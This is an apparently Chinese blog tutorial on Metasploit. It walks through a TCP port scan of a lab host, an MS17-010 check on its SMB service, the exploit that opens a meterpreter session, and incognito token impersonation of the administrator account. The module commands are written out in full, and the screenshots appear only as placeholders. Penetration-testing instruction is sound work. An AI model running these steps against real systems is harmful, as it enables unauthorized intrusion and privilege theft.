metasoloit的使用

本文详细介绍如何使用Metasploit框架进行渗透测试的过程,包括扫描目标端口、识别并验证smb服务漏洞,最终实现利用漏洞获取会话及窃取会话token。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

通过Metasploit扫描目标端口、识别目标smb服务、验证smb服务是否漏洞、攻击smb漏洞服务获得会话,窃取会话token

介绍

msf有三种使用模式,分别是控制台、GUI图形化、web界面,常用的就是控制台。msf攻击一般来说都是先扫描(auxiliary)–攻击(exploits)–模块(payload)–后渗透(post)
在这里插入图片描述

msf扫描

查找msf端口扫描模块:search portscan
在这里插入图片描述
使用tcp扫描端口,命令:use auxiliary/scanner/portscan/tcp或者use 5
Options查看需要设置的选项
在这里插入图片描述
设置需要扫描的目标、线程以及端口
命令:set rhosts 192.168.128.137
Set treads 20
端口根据需要进行设置
在这里插入图片描述

根据扫描结果,发现目标主机开启了smb服务

在这里插入图片描述
对目标主机验证smb服务是否存在漏洞
命令:search auxiliary/scanner/smb/smb_ms17_010
在这里插入图片描述
利用模块进行验证,设置相关参数
Set rhost 192.168.128.137
Run
在这里插入图片描述
通过验证,发现主机极有可能存在smb服务漏洞

利用smb漏洞攻击目标主机

查找攻击模块
Search ms17_010
利用模块
在这里插入图片描述
对相关参数进行设置
Set rhost 192.168.128.137
Run
在这里插入图片描述
成功获得meterpreter会话

窃取token会话

查看当前会话权限
命令:getuid 目的是查看当前权限
在这里插入图片描述
使用令牌窃取工具
命令:use incognito
List_tokens -u 目的是查看存在的令牌
在这里插入图片描述
切换管理员令牌:impersonate_token ‘WIN-J1BPIGJK08N\administrator’
在这里插入图片描述
Token窃取成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值